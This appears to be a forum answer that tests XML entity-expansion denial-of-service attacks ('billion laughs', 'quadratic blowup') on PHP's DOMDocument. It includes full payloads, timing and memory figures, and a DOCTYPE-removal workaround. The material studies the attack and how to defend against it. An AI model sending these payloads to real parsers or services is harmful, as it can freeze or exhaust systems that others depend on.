Note: If you create test-cases with files that contain the XML chunks in the following, expect that editors might be prone to these attacks as well and might freeze/crash.
Billion laugh
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
When loading:
FATAL: #89: Detected an entity reference loop 1:7
... (plus six times the same = seven times total with above)
FATAL: #89: Detected an entity reference loop 14:13
Result:
<?xml version="1.0"?>
Memory usage is light, the peak not touched by DOMDocument
. As this example shows 7 fatal errors, one can conclude and indeed it is so that this loads w/o errors:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>
As entity substitution is not in effect and this work, let's try with
Quadratic Blowup
That is this one here, shortened for your viewing pleasure (my variants are about 27/11kb):
<?xml version="1.0"?>
<!DOCTYPE kaboom [
<!ENTITY a "aaaaaaaaaaaaaaaaaa...">
]>
<kaboom>&a;&a;&a;&a;&a;&a;&a;&a;&a;...</kaboom>
If you use $doc->loadXML($src, LIBXML_NOENT);
this does work as an attack, while I write this, the script is still loading ... . So this actually takes some time to load and consumes memory. Something you can play with your own. W/o LIBXML_NOENT
it works flawlessly and fast.
But there is a caveat, if you obtain the nodeValue
of a tag for example, you will get the entities expanded even if you don't use that loading flag.
A workaround for this issue is to remove the DocumentType node from the document. Note the following code:
$doc = new DOMDocument();
$doc->loadXML($s); // where $s is a Quadratic attack xml string above.
// now remove the doctype node
foreach ($doc->childNodes as $child) {
if ($child->nodeType===XML_DOCUMENT_TYPE_NODE) {
$doc->removeChild($child);
break;
}
}
// Now the following is true:
assert($doc->doctype===NULL);
assert($doc->lastChild->nodeValue==='...');
// Note that entities remain unexpanded in the output XML
// This is not so good since this makes the XML invalid.
// Better is a manual walk through all nodes looking for XML_ENTITY_NODE
assert($doc->saveXML()==="<?xml version="1.0"?>\n<kaboom>&a;&a;&a;&a;&a;&a;&a;&a;&a;...</kaboom>\n");
// however, canonicalization will produce warnings because it must resolve entities
assert($doc->C14N()===False);
// Warning will be like:
// PHP Warning: DOMNode::C14N(): Node XML_ENTITY_REF_NODE is invalid here
So while this workaround will prevent an XML document from consuming resources in a DoS, it makes it easy to generate invalid XML.
Some figures (I reduced the file-size otherwise it takes too long) (code):
LIBXML_NOENT disabled LIBXML_NOENT enabled
Mem: 356 184 (Peak: 435 464) Mem: 356 280 (Peak: 435 464)
Loaded file quadratic-blowup-2.xml into string. Loaded file quadratic-blowup-2.xml into string.
Mem: 368 400 (Peak: 435 464) Mem: 368 496 (Peak: 435 464)
DOMDocument loaded XML 11 881 bytes in 0.001368 secs. DOMDocument loaded XML 11 881 bytes in 15.993627 secs.
Mem: 369 088 (Peak: 435 464) Mem: 369 184 (Peak: 435 464)
Removed load string. Removed load string.
Mem: 357 112 (Peak: 435 464) Mem: 357 208 (Peak: 435 464)
Got XML (saveXML()), length: 11 880 Got XML (saveXML()), length: 11 165 132
Got Text (nodeValue), length: 11 160 314; 11.060893 secs. Got Text (nodeValue), length: 11 160 314; 0.025360 secs.
Mem: 11 517 776 (Peak: 11 532 016) Mem: 11 517 872 (Peak: 22 685 360)
I have not made up my mind so far about protection strategies but now know that loading the billion laugh into PHPStorm will freeze it for example and I stopped testing the later as I didn't wanted to freeze it while writing this.